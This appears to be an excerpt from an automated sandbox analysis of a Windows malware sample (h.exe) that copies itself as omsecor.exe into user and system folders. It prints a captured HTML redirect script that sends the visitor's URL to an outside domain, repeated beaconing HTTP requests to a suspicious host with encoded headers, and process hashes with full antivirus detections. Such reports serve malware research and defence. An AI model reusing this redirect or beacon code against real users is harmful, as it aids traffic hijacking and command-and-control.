65 66 20 3d 20 64 61 74 61 29 0a 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 65 72 72 6f 72 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 74 72 69 65 73 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 72 69 65 73 2d 2d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 72 65 74 72 79 2c 20 69 6e 74 65 72 76 61 6c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 45 72 72 6f 72 3a 20 22 2c 20 65 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.74971434.41.229.245807740C:\Windows\SysWOW64\omsecor.exe
        TimestampBytes transferredDirectionData
        Jan 23, 2024 13:40:07.207370043 CET298OUTGET /580/608.html HTTP/1.1
        From: 133504915384329881
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24
        Host: ow5dirasuek.com
        Connection: Keep-Alive
        Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Jan 23, 2024 13:40:10.202997923 CET298OUTGET /580/608.html HTTP/1.1
        From: 133504915384329881
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24
        Host: ow5dirasuek.com
        Connection: Keep-Alive
        Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Jan 23, 2024 13:40:13.203010082 CET298OUTGET /580/608.html HTTP/1.1
        From: 133504915384329881
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24
        Host: ow5dirasuek.com
        Connection: Keep-Alive
        Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Jan 23, 2024 13:40:19.204269886 CET298OUTGET /580/608.html HTTP/1.1
        From: 133504915384329881
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24
        Host: ow5dirasuek.com
        Connection: Keep-Alive
        Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Jan 23, 2024 13:40:31.218717098 CET298OUTGET /580/608.html HTTP/1.1
        From: 133504915384329881
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24
        Host: ow5dirasuek.com
        Connection: Keep-Alive
        Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:13:38:33
        Start date:23/01/2024
        Path:C:\Users\user\Desktop\h.exe
        Wow64 process (32bit):true
        Commandline:C:\Users\user\Desktop\h.exe
        Imagebase:0x400000
        File size:83'656 bytes
        MD5 hash:564451E54FA0196ACD2FD7F771E5ED1C
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Target ID:2
        Start time:13:38:33
        Start date:23/01/2024
        Path:C:\Users\user\AppData\Roaming\omsecor.exe
        Wow64 process (32bit):true
        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
        Imagebase:0x400000
        File size:83'656 bytes
        MD5 hash:77F1965059059CE58EC10CCA09F566D1
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Antivirus matches:
        • Detection: 100%, Avira
        • Detection: 100%, Joe Sandbox ML
        • Detection: 100%, ReversingLabs
        Reputation:low
        Has exited:true

        Target ID:13
        Start time:14:52:18
        Start date:23/01/2024
        Path:C:\Windows\SysWOW64\omsecor.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\System32\omsecor.exe
        Imagebase:0x400000
        File size:83'656 bytes
        MD5 hash:5A37340FA852E5184BBBA4134E60B591
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Antivirus matches:
        • Detection: 100%, Avira
        • Detection: 100%, Joe Sandbox ML
        • Detection: 100%, ReversingLabs
        Reputation:low
        Has exited:false

        Reset < >